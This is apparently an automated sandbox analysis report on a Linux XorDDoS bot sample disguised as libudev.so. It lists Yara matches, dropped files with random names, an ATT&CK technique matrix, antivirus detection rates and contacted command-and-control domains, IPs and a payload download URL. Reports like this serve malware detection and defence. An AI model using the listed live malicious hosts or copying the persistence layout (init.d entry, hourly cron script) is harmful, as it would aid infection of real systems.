Source: /usr/bin/ockerbcjas (PID: 6573)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ockerbcjas (PID: 6575)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ockerbcjas (PID: 6579)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/xtzjojyyzf (PID: 6585)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/xtzjojyyzf (PID: 6587)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/xtzjojyyzf (PID: 6590)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/xtzjojyyzf (PID: 6592)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/xtzjojyyzf (PID: 6595)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/blrhrkypbo (PID: 6602)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/blrhrkypbo (PID: 6604)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/blrhrkypbo (PID: 6606)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/blrhrkypbo (PID: 6609)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/blrhrkypbo (PID: 6613)	Queries kernel information via 'uname':			Jump to behavior

Source: /tmp/libudev.so (PID: 6231)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: libudev.so, type: SAMPLE
Source: Yara match	File source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6230, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6233, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6234, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6266, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6271, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6273, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6283, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6286, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6289, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6301, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6303, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6306, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6309, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6315, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6318, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6321, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6327, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6334, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6337, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6339, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6342, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6345, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6351, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6354, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6359, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6362, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6375, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6377, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6391, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6393, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6399, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6407, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6410, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6413, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6415, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6427, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6430, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6441, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6447, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6450, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6459, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6462, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6470, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6479, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6482, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6484, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/hfdnmorvjd, type: DROPPED
Source: Yara match	File source: /usr/bin/ctwojuywol, type: DROPPED
Source: Yara match	File source: /usr/bin/cjrbrkowir, type: DROPPED
Source: Yara match	File source: /usr/bin/bnuowhwlvc, type: DROPPED
Source: Yara match	File source: /usr/bin/trcmbxxcta, type: DROPPED
Source: Yara match	File source: /usr/bin/fsqerkomug, type: DROPPED
Source: Yara match	File source: /usr/bin/chrcfbeejh, type: DROPPED
Source: Yara match	File source: /usr/bin/jjfbelholv, type: DROPPED
Source: Yara match	File source: /usr/bin/mljnlxkfff, type: DROPPED
Source: Yara match	File source: /usr/bin/tiupbsaswr, type: DROPPED
Source: Yara match	File source: /etc/init.d/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/uhyqxsqece, type: DROPPED
Source: Yara match	File source: /usr/bin/uijxdyxaco, type: DROPPED
Source: Yara match	File source: /usr/bin/ypclxoxcxk, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Scripting	1 Systemd Service	1 Systemd Service	12 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 At (Linux)	2 At (Linux)	2 At (Linux)	2 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

Threatname: XorDDoS

{"C2 list": []}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
libudev.so	72%	Virustotal		Browse
libudev.so	65%	Metadefender		Browse
libudev.so	88%	ReversingLabs	Linux.Network.XorDDoS
libudev.so	100%	Avira	LINUX/Xorddos.cona
libudev.so	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/bin/hfdnmorvjd	100%	Avira	LINUX/Xorddos.cona
/usr/bin/trcmbxxcta	100%	Avira	LINUX/Xorddos.cona
/usr/bin/mljnlxkfff	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ypclxoxcxk	100%	Avira	LINUX/Xorddos.cona
/usr/bin/fsqerkomug	100%	Avira	LINUX/Xorddos.cona
/usr/bin/jjfbelholv	100%	Avira	LINUX/Xorddos.cona
/usr/bin/cjrbrkowir	100%	Avira	LINUX/Xorddos.cona
/usr/bin/ctwojuywol	100%	Avira	LINUX/Xorddos.cona
/usr/bin/bnuowhwlvc	100%	Avira	LINUX/Xorddos.cona
/usr/bin/chrcfbeejh	100%	Avira	LINUX/Xorddos.cona
/etc/init.d/libudev.so	100%	Avira	LINUX/Xorddos.cona
/usr/bin/uijxdyxaco	100%	Avira	LINUX/Xorddos.cona
/usr/bin/uhyqxsqece	100%	Avira	LINUX/Xorddos.cona
/usr/bin/tiupbsaswr	100%	Avira	LINUX/Xorddos.cona
/usr/bin/hfdnmorvjd	100%	Joe Sandbox ML
/usr/bin/trcmbxxcta	100%	Joe Sandbox ML
/usr/bin/mljnlxkfff	100%	Joe Sandbox ML
/usr/bin/ypclxoxcxk	100%	Joe Sandbox ML
/usr/bin/fsqerkomug	100%	Joe Sandbox ML
/usr/bin/jjfbelholv	100%	Joe Sandbox ML
/usr/bin/cjrbrkowir	100%	Joe Sandbox ML
/usr/bin/ctwojuywol	100%	Joe Sandbox ML
/usr/bin/bnuowhwlvc	100%	Joe Sandbox ML
/usr/bin/chrcfbeejh	100%	Joe Sandbox ML
/etc/init.d/libudev.so	100%	Joe Sandbox ML
/usr/bin/uijxdyxaco	100%	Joe Sandbox ML
/usr/bin/uhyqxsqece	100%	Joe Sandbox ML
/usr/bin/tiupbsaswr	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	0%	Metadefender		Browse
/etc/cron.hourly/gcc.sh	28%	ReversingLabs	Linux.Trojan.XorDDoS
/usr/bin/hfdnmorvjd	60%	Metadefender		Browse
/usr/bin/hfdnmorvjd	80%	ReversingLabs	Linux.Network.XorDDoS

Domains

Source	Detection	Scanner	Label	Link
www1.gggatat456.com	7%	Virustotal		Browse
ppp.xxxatat456.com	8%	Virustotal		Browse
p5.lpjulidny7.com	11%	Virustotal		Browse
p5.dddgata789.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hf	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tr	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cu	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ui	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uh	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zp	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ti	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cj	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hr	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bn	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9fs	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9jj	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ml	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mo	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t	100%	Avira URL Cloud	malware
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ch	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www1.gggatat456.com	54.36.15.99	true	true	7%, Virustotal, Browse	unknown
ppp.xxxatat456.com	54.36.15.96	true	true	8%, Virustotal, Browse	unknown
p5.lpjulidny7.com	unknown	unknown	false	11%, Virustotal, Browse	unknown
p5.dddgata789.com	unknown	unknown	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp	libudev.so, 6369.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6372.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6375.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6377.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6380.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9hf	libudev.so, 6476.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6479.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6482.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6484.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6489.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tr	libudev.so, 6298.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6301.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6303.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6306.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6309.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cu	libudev.so, 6530.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6533.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6536.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6539.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6541.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct	libudev.so, 6315.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6318.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6321.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6324.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6327.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ui	libudev.so, 6424.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6427.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6430.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6432.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6435.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uh	libudev.so, 6388.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6391.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6393.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6396.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6399.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zp	libudev.so, 6548.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6551.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ti	libudev.so, 6407.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6410.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6413.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6415.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6418.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	true	Avira URL Cloud: malware	unknown
